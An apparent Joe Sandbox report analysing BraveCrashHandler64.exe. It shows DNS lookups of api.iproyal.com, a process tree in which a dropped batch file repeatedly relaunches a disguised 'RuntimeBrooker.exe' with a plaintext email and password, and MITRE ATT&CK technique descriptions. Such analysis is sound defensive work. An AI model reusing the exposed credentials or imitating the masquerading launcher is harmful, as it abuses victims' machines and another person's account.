Apr 25, 2024 14:23:05.004666090 CEST	1.1.1.1	192.168.2.7	0xeebb	No error (0)	api.iproyal.com	193.228.196.69	A (IP address)	IN (0x0001)	false
Apr 25, 2024 14:23:05.004666090 CEST	1.1.1.1	192.168.2.7	0xeebb	No error (0)	api.iproyal.com	93.189.62.83	A (IP address)	IN (0x0001)	false
Apr 25, 2024 14:23:42.387455940 CEST	1.1.1.1	192.168.2.7	0x445f	No error (0)	api.iproyal.com	193.228.196.69	A (IP address)	IN (0x0001)	false
Apr 25, 2024 14:23:42.387455940 CEST	1.1.1.1	192.168.2.7	0x445f	No error (0)	api.iproyal.com	93.189.62.83	A (IP address)	IN (0x0001)	false
Apr 25, 2024 14:24:25.618228912 CEST	1.1.1.1	192.168.2.7	0x96b0	No error (0)	api.iproyal.com	93.189.62.83	A (IP address)	IN (0x0001)	false
Apr 25, 2024 14:24:25.618228912 CEST	1.1.1.1	192.168.2.7	0x96b0	No error (0)	api.iproyal.com	193.228.196.69	A (IP address)	IN (0x0001)	false
Apr 25, 2024 14:24:44.358824968 CEST	1.1.1.1	192.168.2.7	0xa229	No error (0)	api.iproyal.com	93.189.62.83	A (IP address)	IN (0x0001)	false
Apr 25, 2024 14:24:44.358824968 CEST	1.1.1.1	192.168.2.7	0xa229	No error (0)	api.iproyal.com	193.228.196.69	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	14:21:09
Start date:	25/04/2024
Path:	C:\Users\user\Desktop\BraveCrashHandler64.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\BraveCrashHandler64.exe"
Imagebase:	0x400000
File size:	14'419'456 bytes
MD5 hash:	D56A7D817C035803B7538F17CC2EAD45
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	14:21:10
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\12605RR4.bat" "C:\Users\user\Desktop\BraveCrashHandler64.exe""
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	14:21:10
Start date:	25/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	14:21:10
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 1252
Imagebase:	0x840000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:21:10
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xc20000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:21:10
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /i "RuntimeBrooker.exe"
Imagebase:	0x9a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:21:11
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos
Imagebase:	0x4f0000
File size:	12'024'072 bytes
MD5 hash:	7D1082288A0D3F0467C1D57DE7471036
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:21:14
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xc20000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	14:21:14
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /i "RuntimeBrooker.exe"
Imagebase:	0x9a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:21:14
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos
Imagebase:	0x4f0000
File size:	12'024'072 bytes
MD5 hash:	7D1082288A0D3F0467C1D57DE7471036
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	14:21:17
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xc20000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	14:21:17
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /i "RuntimeBrooker.exe"
Imagebase:	0x9a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	14:21:18
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos
Imagebase:	0x4f0000
File size:	12'024'072 bytes
MD5 hash:	7D1082288A0D3F0467C1D57DE7471036
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	14:21:20
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xc20000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	14:21:20
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /i "RuntimeBrooker.exe"
Imagebase:	0x9a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	14:21:21
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos
Imagebase:	0x4f0000
File size:	12'024'072 bytes
MD5 hash:	7D1082288A0D3F0467C1D57DE7471036
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	14:21:24
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xc20000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	14:21:24
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /i "RuntimeBrooker.exe"
Imagebase:	0x9a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	14:21:26
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos
Imagebase:	0x4f0000
File size:	12'024'072 bytes
MD5 hash:	7D1082288A0D3F0467C1D57DE7471036
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	16:01:24
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x7ff7b4ee0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	16:01:24
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /i "RuntimeBrooker.exe"
Imagebase:	0x9a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	16:01:24
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos
Imagebase:	0x4f0000
File size:	12'024'072 bytes
MD5 hash:	7D1082288A0D3F0467C1D57DE7471036
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	16:01:27
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xc20000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	16:01:27
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /i "RuntimeBrooker.exe"
Imagebase:	0x9a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	16:01:28
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos
Imagebase:	0x4f0000
File size:	12'024'072 bytes
MD5 hash:	7D1082288A0D3F0467C1D57DE7471036
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	16:01:31
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xc20000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	16:01:31
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /i "RuntimeBrooker.exe"
Imagebase:	0x9a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	16:01:31
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos
Imagebase:	0x4f0000
File size:	12'024'072 bytes
MD5 hash:	7D1082288A0D3F0467C1D57DE7471036
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	16:01:35
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xc20000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	16:01:35
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /i "RuntimeBrooker.exe"
Imagebase:	0x9a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	16:01:36
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos
Imagebase:	0x4f0000
File size:	12'024'072 bytes
MD5 hash:	7D1082288A0D3F0467C1D57DE7471036
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	16:01:38
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xc20000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	16:01:38
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /i "RuntimeBrooker.exe"
Imagebase:	0x9a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	16:01:39
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos
Imagebase:	0x4f0000
File size:	12'024'072 bytes
MD5 hash:	7D1082288A0D3F0467C1D57DE7471036
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	16:01:40
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xc20000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	16:01:40
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /i "RuntimeBrooker.exe"
Imagebase:	0x9a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	16:01:41
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user~1\AppData\Local\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos
Imagebase:	0x4f0000
File size:	12'024'072 bytes
MD5 hash:	7D1082288A0D3F0467C1D57DE7471036
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Has exited:	true

Show Windows behavior

Function 00007FF4AF9A51F0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1334334946.00007FF4AF9A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00007FF4AF9A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff4af9a0000_RuntimeBrooker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fd636ab35bef94c6a3cda03bd593549abb79925e256c49fedffb427f4cb9ff9
Instruction ID: f15ccb0f3b562882e68252de14cb013d3848736494bd1a62041dde2e44339730
Opcode Fuzzy Hash: 1fd636ab35bef94c6a3cda03bd593549abb79925e256c49fedffb427f4cb9ff9
Instruction Fuzzy Hash: 1FD012E560EBC81FF75765280C99B351BD8EB35301F950096E94CCB1EBE80D8D858275

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report BraveCrashHandler64.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\12605RR4.bat

C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Windows Analysis Report
BraveCrashHandler64.exe